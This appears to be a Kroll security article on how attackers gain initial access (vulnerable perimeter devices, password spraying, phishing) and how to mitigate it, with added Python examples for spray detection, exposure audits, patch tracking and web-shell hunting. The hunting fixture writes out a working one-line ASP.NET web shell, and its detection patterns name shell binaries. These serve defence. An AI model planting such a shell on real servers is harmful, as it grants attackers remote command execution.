
Initial access in cyberattacks: Common adversary methods and mitigation strategies

By Chris Ballod, Thomas Brittain, Jessica Venturo
January 11, 2022

As the ransomware marketplace matures, certain specialized skills have grown in demand, in particular those of initial access brokers (IABs), who compromise systems, gain a foothold within a network and sell that access on to ransomware operators. With that in mind, this article looks at effective ways to prevent threat actors from gaining initial access and so to limit the damage done in the later stages of a ransomware attack.

Common methods for initial access

Threat actors rely on a small set of tactics, techniques and procedures (TTPs) to gain initial access to a victim’s network. The most common are:

  1. Identifying networks with vulnerable applications or devices, including virtual private network (VPN) appliances, perimeter devices (e.g., firewalls) and other internet-facing systems (e.g., web servers, mail servers). Over the past year, attackers have exploited several critical vulnerabilities, including zero-day vulnerabilities, in such devices to access sensitive data and/or execute code remotely.
  2. Locating internet-facing remote services, such as exposed Remote Desktop Protocol (RDP) or Outlook on the Web (OWA), that can be used as a door into the network. We have seen threat actors gain access to such services by guessing credentials with brute-force techniques (e.g., password spraying, in which a few common passwords are tried against many accounts to stay under lockout thresholds), and by replaying credentials tied to the target organization that had been exposed in credential dumps on the dark web.
  3. Sending phishing messages, typically via email but sometimes via live chat, to obtain access to victim systems. We have identified cases where threat actors sent one or more emails containing malicious attachments or links that, once opened or clicked by the victim, allowed the threat actors to harvest credentials and/or deploy malware that gave them access to the victim system.
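The second TTP above is detectable in ordinary authentication logs if you look at the shape of the failures rather than their count alone. The following added example (not code from the article or its authors) shows detection logic that separates a password spray (one source, many accounts, one or two tries each) from a classic brute force (one source, one account, many tries) and then flags any account that subsequently logged in successfully from a spraying source, since that is the account to reset first. The log format (`timestamp,user,src_ip,result`), the thresholds and the sample events are all constructed for the illustration.

```python
"""Detect password spraying and brute-force logins in authentication events.

Added example; constructed input, not from the article. Format assumed:
timestamp,user,src_ip,result  (result is FAIL or SUCCESS).
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)
SPRAY_MIN_ACCOUNTS = 8       # one source failing against this many accounts ...
SPRAY_MAX_PER_ACCOUNT = 3    # ... while staying under per-account lockout thresholds
BRUTE_MIN_FAILS = 15         # one source hammering a single account


def build_sample_log():
    """Constructed events: a spray that lands on 'judy', a brute force against
    'alice', and a benign user who mistypes a password twice."""
    lines = []
    sprayed = ["alice", "bob", "carol", "dave", "erin",
               "frank", "grace", "heidi", "ivan", "judy"]
    for i, user in enumerate(sprayed):
        lines.append(f"2022-01-10T09:00:{2 * i:02d},{user},203.0.113.10,FAIL")
    lines.append("2022-01-10T09:00:30,judy,203.0.113.10,SUCCESS")
    for i in range(20):
        lines.append(f"2022-01-10T09:01:{i:02d},alice,198.51.100.7,FAIL")
    lines += [
        "2022-01-10T10:30:00,mallory,192.0.2.44,FAIL",
        "2022-01-10T10:30:10,mallory,192.0.2.44,FAIL",
        "2022-01-10T10:30:20,mallory,192.0.2.44,SUCCESS",
    ]
    return "\n".join(lines)


def parse_events(log_text):
    events = []
    for line in log_text.strip().splitlines():
        ts, user, src, result = line.split(",")
        events.append((datetime.fromisoformat(ts), user, src, result))
    events.sort()
    return events


def detect(events):
    spray_sources = set()
    brute_force = set()
    compromised = set()
    recent_fails = defaultdict(deque)   # src_ip -> (ts, user) failures inside WINDOW
    for ts, user, src, result in events:
        if result == "SUCCESS":
            # A success from a source already seen spraying is the account to reset first.
            if src in spray_sources:
                compromised.add(user)
            continue
        window = recent_fails[src]
        window.append((ts, user))
        while window and ts - window[0][0] > WINDOW:
            window.popleft()
        per_account = defaultdict(int)
        for _, u in window:
            per_account[u] += 1
        # Spray: many accounts, few tries each. Brute force: one account, many tries.
        if (len(per_account) >= SPRAY_MIN_ACCOUNTS
                and max(per_account.values()) <= SPRAY_MAX_PER_ACCOUNT):
            spray_sources.add(src)
        if per_account[user] >= BRUTE_MIN_FAILS:
            brute_force.add((src, user))
    return {"spray_sources": spray_sources,
            "brute_force": brute_force,
            "compromised_accounts": compromised}


if __name__ == "__main__":
    for name, value in detect(parse_events(build_sample_log())).items():
        print(f"{name}: {sorted(value)}")
```

The spray rule deliberately requires a low per-account maximum: a source that fails against many accounts but also hammers one of them is behaving like a brute forcer and would trigger lockouts on its own, whereas a real sprayer never crosses the lockout threshold and is invisible to per-account counters. In production the same logic runs over Windows 4625/4624 events or an IdP's sign-in log, with the source field being the client IP or, for cloud services, the client IP plus user agent.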

Mitigation strategies to address common methods of initial access

To reduce the risk of threat actors using these initial access methods, a layered approach works best: first shrink the organization’s attack surface, then protect what remains by managing its vulnerabilities.

Attack surface management

One of the first steps in managing attack surface effectively is identifying an organization’s IT assets and diagramming its network. Once assets are inventoried and the network is understood, an organization can see its attack surface accurately. Systems on the network perimeter should be placed behind a firewall and/or VPN where possible. Hosts and applications that must remain internet-facing, often email, cloud environments or hosts that provide external remote services, should be protected with two- or multi-factor authentication (2FA/MFA). MFA pairs a username and password with an additional factor of a different kind, such as a one-time code from an authenticator app or a hardware security key, so an attacker who has obtained a user’s username and password still cannot log in as that user. (A PIN is another knowledge factor and does not provide this protection on its own.) MFA should be required for all remote access, cloud services and privileged accounts.

Overall, understanding an organization’s attack surface, reducing it where possible and properly securing the remaining systems and services greatly reduces the risk of initial access. For example, attackers routinely target systems with exposed RDP services. Moving such remote access services behind a corporate VPN and requiring MFA on that VPN removes the direct path and leaves an attacker with stolen credentials unable to use them.
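The inventory-then-compare loop described above can be automated. The added example below (not code from the article or its authors) reconciles an asset inventory, which records who owns each host, which ports are approved to be internet-facing and whether the service is behind a VPN and enforces MFA, against the output of an external port scan. It raises findings for unmanaged hosts, unapproved services, remote access protocols answering directly from the internet, and authenticated services without MFA, and then models the article’s RDP fix to show the findings disappear. The hosts, scan results, severity policy and the `Asset` record are all hypothetical.

```python
"""Reconcile an asset inventory against an external port scan.

Added example, not from the article. Inventory, scan output and the policy
thresholds are all constructed/hypothetical.
"""
from dataclasses import dataclass, replace


@dataclass(frozen=True)
class Asset:
    owner: str
    approved_ports: frozenset   # ports permitted to answer from the internet
    requires_login: bool        # service authenticates users (OWA, RDP, VPN portal)
    mfa: bool                   # MFA enforced on that login
    behind_vpn: bool            # reachable only after a VPN/ZTNA connection


# Constructed inventory (hypothetical hosts)
INVENTORY = {
    "mail.example.com": Asset("messaging", frozenset({443}), True, True, False),
    "jump.example.com": Asset("it-ops", frozenset({3389}), True, False, False),
    "www.example.com": Asset("marketing", frozenset({80, 443}), False, False, False),
}

# Constructed external scan result: (host, port, service banner)
SCAN = [
    ("mail.example.com", 443, "https"),
    ("jump.example.com", 3389, "ms-wbt-server"),
    ("www.example.com", 443, "https"),
    ("www.example.com", 22, "ssh"),             # never approved for this host
    ("legacy-vpn.example.com", 443, "https"),   # host nobody inventoried
]

REMOTE_ACCESS_PORTS = {3389: "RDP", 22: "SSH", 5900: "VNC", 445: "SMB", 23: "Telnet"}
SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2}


def exposure_findings(inventory, scan):
    """Return (severity, host, port, message) tuples, most severe first."""
    findings = []
    for host, port, service in scan:
        asset = inventory.get(host)
        if asset is None:
            findings.append(("high", host, port,
                             f"{service} on a host missing from the inventory"))
            continue
        if port in REMOTE_ACCESS_PORTS and not asset.behind_vpn:
            findings.append(("critical", host, port,
                             f"{REMOTE_ACCESS_PORTS[port]} answers directly from the internet; "
                             f"move behind VPN and require MFA"))
        if port not in asset.approved_ports:
            findings.append(("high", host, port,
                             f"{service} not approved for exposure by owner {asset.owner}"))
        elif asset.requires_login and not asset.mfa:
            findings.append(("medium", host, port, f"{service} accepts logins without MFA"))
    findings.sort(key=lambda f: (SEVERITY_RANK[f[0]], f[1], f[2]))
    return findings


def harden_remote_access(inventory, host):
    """Model the fix the article recommends: keep the service, put it behind the
    corporate VPN and enforce MFA, and record that in the inventory."""
    return {**inventory, host: replace(inventory[host], behind_vpn=True, mfa=True)}


if __name__ == "__main__":
    for finding in exposure_findings(INVENTORY, SCAN):
        print(*finding)
    print("after hardening jump host:",
          exposure_findings(harden_remote_access(INVENTORY, "jump.example.com"), SCAN))
```

Two design points: the unknown host is reported even though it only shows an HTTPS port, because an asset nobody owns is an asset nobody patches, and the check is driven by the inventory rather than by the scan, so a new host or port can only pass once someone has claimed it and recorded its controls. After the jump host is moved behind the VPN, a fresh external scan should no longer show 3389 at all; the policy check passing is necessary but not sufficient.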

Vulnerability management

The IT asset inventory built for attack surface management also lets an organization manage and secure its full estate, not just the perimeter. Vulnerability management is critical to securing an organization’s IT assets. A mature vulnerability management program includes regular patching to reduce the window in which a vulnerability can be exploited, as well as routine scanning of all external and internal systems, devices and applications for vulnerable software. Many perimeter and internet-connected devices currently in use by companies (e.g., firewalls, VPNs and mail servers) have critical published vulnerabilities that, if left unpatched, expose the organization to compromise.

It is important to know which assets your organization runs so the relevant vendors can be monitored for security releases and patches can be applied in a timely manner. In some instances a patch is not yet available, or additional actions beyond patching must be performed to secure an asset against a new vulnerability.
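The following added example (not code from the article or its authors) shows the core of that monitoring loop: the inventory is matched against a list of vendor advisories, each host missing a fix is given a due date from a severity-based SLA that is halved for internet-facing assets, and advisories with no fix yet are reported with a “mitigate” action instead of being silently skipped. It also compares versions numerically, since a string comparison would wrongly report 9.1.10 as older than 9.1.4. The products, versions, advisories and SLA days are constructed for the illustration and are not real CVE data.

```python
"""Match an asset inventory against vendor advisories and compute patch SLAs.

Added example, not from the article. Products, versions, advisories and SLA
numbers are constructed/hypothetical, not real CVE data.
"""
from datetime import date, timedelta

# product -> list of (fixed_version or None when no patch exists yet, severity, published)
ADVISORIES = {
    "acme-vpn": [("9.1.4", "critical", date(2022, 1, 3))],
    "acme-mail": [("2.8.0", "high", date(2021, 12, 15)),
                  ("2.9.2", "medium", date(2022, 1, 5))],
    "acme-fw": [(None, "critical", date(2022, 1, 9))],   # vendor mitigation only so far
}

# (host, product, installed version, internet-facing)
INVENTORY = [
    ("vpn1", "acme-vpn", "9.1.2", True),
    ("vpn2", "acme-vpn", "9.1.10", True),    # newer than 9.1.4; a string compare would say otherwise
    ("mail1", "acme-mail", "2.8.5", True),
    ("mail2", "acme-mail", "2.7.9", False),
    ("fw1", "acme-fw", "5.2.0", True),
]

SLA_DAYS = {"critical": 7, "high": 14, "medium": 30}   # hypothetical policy


def parse_version(text):
    """Numeric tuple so 9.1.10 > 9.1.4 (a plain string compare gets this wrong)."""
    return tuple(int(part) for part in text.split("."))


def missing_patches(inventory, advisories, today):
    """One finding per (host, advisory) the host has not yet satisfied."""
    findings = []
    for host, product, installed, external in inventory:
        for fixed, severity, published in advisories.get(product, []):
            if fixed is not None and parse_version(installed) >= parse_version(fixed):
                continue    # already at or past the fixed release
            # Internet-facing assets get half the time: they are the initial access targets.
            days = SLA_DAYS[severity] // 2 if external else SLA_DAYS[severity]
            due = published + timedelta(days=days)
            findings.append({
                "host": host, "product": product, "installed": installed,
                "fixed": fixed, "severity": severity, "due": due,
                "overdue": today > due,
                "action": "patch" if fixed else "mitigate",
            })
    return findings


def overdue_hosts(findings):
    return sorted({f["host"] for f in findings if f["overdue"]})


if __name__ == "__main__":
    report = missing_patches(INVENTORY, ADVISORIES, date(2022, 1, 11))
    for f in report:
        print(f"{f['host']:6} {f['severity']:9} {f['action']:9} due {f['due']}"
              f"{'  OVERDUE' if f['overdue'] else ''}")
    print("overdue:", overdue_hosts(report))
```

A host with no available fix still appears in the report with the same due date as a patchable one; the work item is to apply the vendor’s interim mitigation and to re-check the advisory feed until a fixed version is published, at which point the same entry flips to “patch”.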

For example, the recent vulnerabilities affecting Microsoft Exchange servers, collectively referred to as ProxyLogon and ProxyShell, exposed organizations to the risk of malicious web shells being deployed on their Exchange servers. Patching closes the vulnerability but does not remove anything the attacker left behind: any web shell successfully deployed before the patch was applied still had to be found and removed by hand to close the security gap. Understanding these supplementary actions, by monitoring threat intelligence sources, researching the applicable vulnerabilities, or engaging a knowledgeable third party to assist in recovery, is essential to fully securing an asset.
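The post-patch hunt described above can be scripted. The added example below (not code from the article, its authors or Microsoft) walks a web root, skips every `.aspx` file whose hash matches a known-good set (in practice, the hashes of the files the patched build ships), and ranks every remaining file by how many generic ASP.NET web-shell heuristics its content matches. The heuristics, the sample files (a vendor page, a planted one-line shell and an unknown but harmless page) and the known-good set are constructed for the illustration; they are not a vendor IOC list, and a real hunt would combine them with the vendor’s published indicators and with the IIS logs for the flagged paths.

```python
"""Hunt for web shells left on a web server after patching.

Added example, not from the article. The heuristics are generic ASP.NET
web-shell indicators chosen for illustration, not a vendor IOC list; the
sample files and the 'known-good' hash set are constructed.
"""
import hashlib
import re
import tempfile
from datetime import datetime, timezone
from pathlib import Path

SUSPICIOUS = {
    "jscript_page": re.compile(rb'Language\s*=\s*"?JScript', re.I),
    "eval": re.compile(rb'\beval\s*\(', re.I),
    "request_input": re.compile(rb'Request\s*(\.Item|\.Form|\.QueryString|\[)', re.I),
    "process_start": re.compile(rb'Process\.Start|System\.Diagnostics', re.I),
    "shell_binary": re.compile(rb'cmd\.exe|powershell', re.I),
    "base64_decode": re.compile(rb'FromBase64String', re.I),
}


def sha256(data):
    return hashlib.sha256(data).hexdigest()


def hunt(web_root, known_good_hashes):
    """Flag every .aspx under web_root whose hash is not in the known-good set;
    rank by how many web-shell heuristics its content matches."""
    findings = []
    for path in sorted(Path(web_root).rglob("*.aspx")):
        data = path.read_bytes()
        if sha256(data) in known_good_hashes:
            continue                       # shipped by the vendor, unmodified
        hits = [name for name, rx in SUSPICIOUS.items() if rx.search(data)]
        confidence = "high" if len(hits) >= 2 else "medium" if hits else "low"
        modified = datetime.fromtimestamp(path.stat().st_mtime, tz=timezone.utc)
        findings.append({"path": path.name, "confidence": confidence,
                         "hits": hits, "modified": modified.isoformat()})
    findings.sort(key=lambda f: ("high", "medium", "low").index(f["confidence"]))
    return findings


def build_fixture():
    """Constructed web root: one vendor page, one planted shell, one unknown page.
    Returns the root and the known-good hash set (vendor page only)."""
    root = Path(tempfile.mkdtemp())
    auth = root / "auth"
    auth.mkdir()
    vendor_page = b'<%@ Page Language="C#" %><form runat="server">Sign in</form>'
    (auth / "logon.aspx").write_bytes(vendor_page)
    (auth / "planted.aspx").write_bytes(
        b'<%@ Page Language="JScript" %><% eval(Request.Item["cmd"], "unsafe"); %>')
    (auth / "custom.aspx").write_bytes(b'<%@ Page Language="C#" %>Maintenance notice')
    return root, {sha256(vendor_page)}


if __name__ == "__main__":
    root, known_good = build_fixture()
    for finding in hunt(root, known_good):
        print(finding["confidence"], finding["path"], finding["hits"], finding["modified"])
```

The "low" bucket matters as much as the "high" one: a file the vendor did not ship and that matches no heuristic is still a file someone else put there, and attackers routinely obfuscate shells past simple pattern matching. The modification time is reported for triage only; it is not used as a filter, because the patch itself rewrites legitimate files and an attacker can timestomp.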

The recommendations above do not address every method of initial access, nor do they mitigate the activity that typically follows initial access, but implementing them provides significant protection against the common threats companies face and sharply limits an actor’s ability to gain initial access to the network. In addition to vulnerability and attack surface management, we strongly recommend 10 cybersecurity controls essential for increased resilience.

If your organization does not have the internal capabilities to perform these strategies in-house, consider reaching out to a reputable third party to help provide any or all of the above services and improve your organization’s security posture.

KEYWORDS: attacks cyber attack cyber security threat initial access brokers (IABs) multi-factor authentication ransomware third-party cybersecurity


Chris Ballod is an Associate Managing Director with the Cyber Risk practice of Kroll based in Philadelphia. Ballod's experience is in data privacy and cybersecurity, counseling clients in the preparation for a cyber incident, and during the response and notification process after an incident occurs. Prior to joining Kroll, Ballod was a Partner and Vice Chair of the Data Privacy & Cybersecurity practice at Lewis Brisbois Bisgaard & Smith LLP.

Thomas Brittain is an Associate Managing Director with the Cyber Risk practice of Kroll based in St. Louis. Brittain has information security experience advising organizations on secure configurations, risk reduction, incident response and tackling tough security challenges. Prior to joining Kroll, Brittain was Senior Manager of Carbon Black’s global incident response (IR) partner program.

Jessica Venturo is a Cyber Risk Senior Associate with Kroll based in Virginia. Venturo has experience supporting Fortune 500 companies in industries ranging from financial services to insurance to retail. She specializes in cyber investigations, incident response and digital forensics.
